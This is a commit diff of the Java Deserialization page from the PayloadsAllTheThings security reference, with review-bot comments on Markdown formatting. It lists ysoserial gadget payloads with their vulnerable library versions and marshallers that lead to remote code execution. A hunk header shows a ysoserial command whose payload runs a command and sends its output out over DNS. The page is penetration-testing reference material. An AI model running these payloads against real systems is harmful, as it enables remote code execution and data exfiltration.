mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-12-30 14:40:28 -08:00
Normalize page header for GraphQL, Deserialization, SCM
@@ -1,5 +1,8 @@
# Java Deserialization
> Java serialization is the process of converting a Java object’s state into a byte stream, which can be stored or transmitted and later reconstructed (deserialized) back into the original object. Serialization in Java is primarily done using the `Serializable` interface, which marks a class as serializable, allowing it to be saved to files, sent over a network, or transferred between JVMs.
## Summary
* [Detection](#detection)
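Review bot: the new blockquote (`> Java serialization is the process ...`) explains what serialization is but not why this page exists: it never says that the risk comes from deserializing attacker-controlled bytes, which lets the input decide which classes get instantiated (the gadget chains listed under Tools). Consider closing the paragraph with one sentence to that effect, e.g. `Deserializing untrusted input is dangerous because the byte stream, not the application, chooses which classes are instantiated.` Also, the typographic apostrophe in `object’s` should be a plain `'` to match the rest of the README.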
@@ -19,6 +22,7 @@
- Content-type = "application/x-java-serialized-object"
- `"H4sIAAAAAAAAAJ"` in gzip(base64)
## Tools
### Ysoserial
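Review bot: list-marker style is inconsistent within this file: the Summary uses `* [Detection](#detection)` while the detection bullets use `- Content-type = ...` and `- "H4sIAAAAAAAAAJ" in gzip(base64)`. Since this commit is normalizing the page header, pick one marker for both lists. The first detection bullet would also read more clearly formatted the way the second one already is, i.e. as a code span holding the header as it appears on the wire, `Content-Type: application/x-java-serialized-object`, rather than the pseudo-assignment `Content-type = "..."`.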
@@ -33,44 +37,44 @@ java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | b
```
**List of payloads included in ysoserial:**
```ps1
Payload Authors Dependencies
------- ------- ------------
AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0
Clojure @JackOfMostTrades clojure:1.8.0
CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
CommonsCollections1 @frohoff commons-collections:3.1
CommonsCollections2 @frohoff commons-collections4:4.0
CommonsCollections3 @frohoff commons-collections:3.1
CommonsCollections4 @frohoff commons-collections4:4.0
CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
CommonsCollections6 @matthias_kaiser commons-collections:3.1
CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
Groovy1 @frohoff groovy:2.3.9
Hibernate1 @mbechler
Hibernate2 @mbechler
JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
JRMPClient @mbechler
JRMPListener @mbechler
JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
Jdk7u21 @frohoff
Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
MozillaRhino1 @matthias_kaiser js:1.7R2
MozillaRhino2 @_tint0 js:1.7R2
Myfaces1 @mbechler
Myfaces2 @mbechler
ROME @mbechler rome:1.0
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
URLDNS @gebl
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
```
| Payload | Authors | Dependencies |
| ------------------- | -------------------------------------- | --- |
| AspectJWeaver | @Jang | aspectjweaver:1.9.2, commons-collections:3.2.2 |
| BeanShell1 | @pwntester, @cschneider4711 | bsh:2.0b5 |
| C3P0 | @mbechler | c3p0:0.9.5.2, mchange-commons-java:0.2.11 |
| Click1 | @artsploit | click-nodeps:2.3.0, javax.servlet-api:3.1.0 |
| Clojure | @JackOfMostTrades | clojure:1.8.0 |
| CommonsBeanutils1 | @frohoff | commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 |
| CommonsCollections1 | @frohoff | commons-collections:3.1 |
| CommonsCollections2 | @frohoff | commons-collections4:4.0 |
| CommonsCollections3 | @frohoff | commons-collections:3.1 |
| CommonsCollections4 | @frohoff | commons-collections4:4.0 |
| CommonsCollections5 | @matthias_kaiser, @jasinner | commons-collections:3.1 |
| CommonsCollections6 | @matthias_kaiser | commons-collections:3.1 |
| CommonsCollections7 | @scristalli, @hanyrax, @EdoardoVignati | commons-collections:3.1 |
| FileUpload1 | @mbechler | commons-fileupload:1.3.1, commons-io:2.4|
| Groovy1 | @frohoff | groovy:2.3.9 |
| Hibernate1 | @mbechler | |
| Hibernate2 | @mbechler | |
| JBossInterceptors1 | @matthias_kaiser | javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 |
| JRMPClient | @mbechler | |
| JRMPListener | @mbechler | |
| JSON1 | @mbechler | json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 |
| JavassistWeld1 | @matthias_kaiser | javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 |
| Jdk7u21 | @frohoff | |
| Jython1 | @pwntester, @cschneider4711 | jython-standalone:2.5.2 |
| MozillaRhino1 | @matthias_kaiser | js:1.7R2 |
| MozillaRhino2 | @_tint0 | js:1.7R2 |
| Myfaces1 | @mbechler | |
| Myfaces2 | @mbechler | |
| ROME | @mbechler | rome:1.0 |
| Spring1 | @frohoff | spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE |
| Spring2 | @mbechler | spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 |
| URLDNS | @gebl | |
| Vaadin1 | @kai_ullrich | vaadin-server:7.7.14, vaadin-shared:7.7.14 |
| Wicket1 | @jacob-baines | wicket-util:6.23.0, slf4j-api:1.6.4 |
### Burp extensions
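Review bot: in the new table the `FileUpload1` row is missing the space before its closing pipe (`commons-fileupload:1.3.1, commons-io:2.4|`), unlike every other row; renderers tolerate it, but it is the one inconsistency in an otherwise uniform block, so add the space. Replacing the old block is the right call, since it was fenced as ```ps1 although it was plain text and not PowerShell; for readability in source, the separator row's third column (`| --- |`) could be padded to the width of the other two like the header cells are.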
@@ -108,23 +112,23 @@ Wicket1 @jacob-baines wicket-util:6.23.0, s
// arguments - Gadget specific arguments
```
Payload generators for the following marshallers are included:<br />
Payload generators for the following marshallers are included:
| Marshaller | Gadget Impact
| ------------------------------- | ----------------------------------------------
| BlazeDSAMF(0|3|X) | JDK only escalation to Java serialization<br/>various third party libraries RCEs
| Hessian|Burlap | various third party RCEs
| Castor | dependency library RCE
| Jackson | **possible JDK only RCE**, various third party RCEs
| Java | yet another third party RCE
| JsonIO | **JDK only RCE**
| JYAML | **JDK only RCE**
| Kryo | third party RCEs
| KryoAltStrategy | **JDK only RCE**
| Red5AMF(0|3) | **JDK only RCE**
| SnakeYAML | **JDK only RCEs**
| XStream | **JDK only RCEs**
| YAMLBeans | third party RCE
| Marshaller | Gadget Impact |
| ------------------------------- | ---------------------------------------------- |
| BlazeDSAMF(0|3|X) | JDK only escalation to Java serialization various third party libraries RCEs |
| Hessian|Burlap | various third party RCEs |
| Castor | dependency library RCE |
| Jackson | **possible JDK only RCE**, various third party RCEs |
| Java | yet another third party RCE |
| JsonIO | **JDK only RCE** |
| JYAML | **JDK only RCE** |
| Kryo | third party RCEs |
| KryoAltStrategy | **JDK only RCE** |
| Red5AMF(0|3) | **JDK only RCE** |
| SnakeYAML | **JDK only RCEs** |
| XStream | **JDK only RCEs** |
| YAMLBeans | third party RCE |
## References
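Review bot: two rows of the marshaller table still contain unescaped pipes inside a cell, `BlazeDSAMF(0|3|X)` and `Hessian|Burlap`; a Markdown table parser treats every `|` as a column separator, so those rows render with the wrong number of cells and the newly added closing pipes do not fix that. Escape them as `BlazeDSAMF(0\|3\|X)` and `Hessian\|Burlap`. Separately, the `BlazeDSAMF` row dropped its `<br/>` without putting anything in its place, so the cell now reads `JDK only escalation to Java serialization various third party libraries RCEs`; a comma or semicolon between the two clauses would keep the two impacts distinct. Dropping the duplicated `Payload generators for the following marshallers are included:<br />` line is correct.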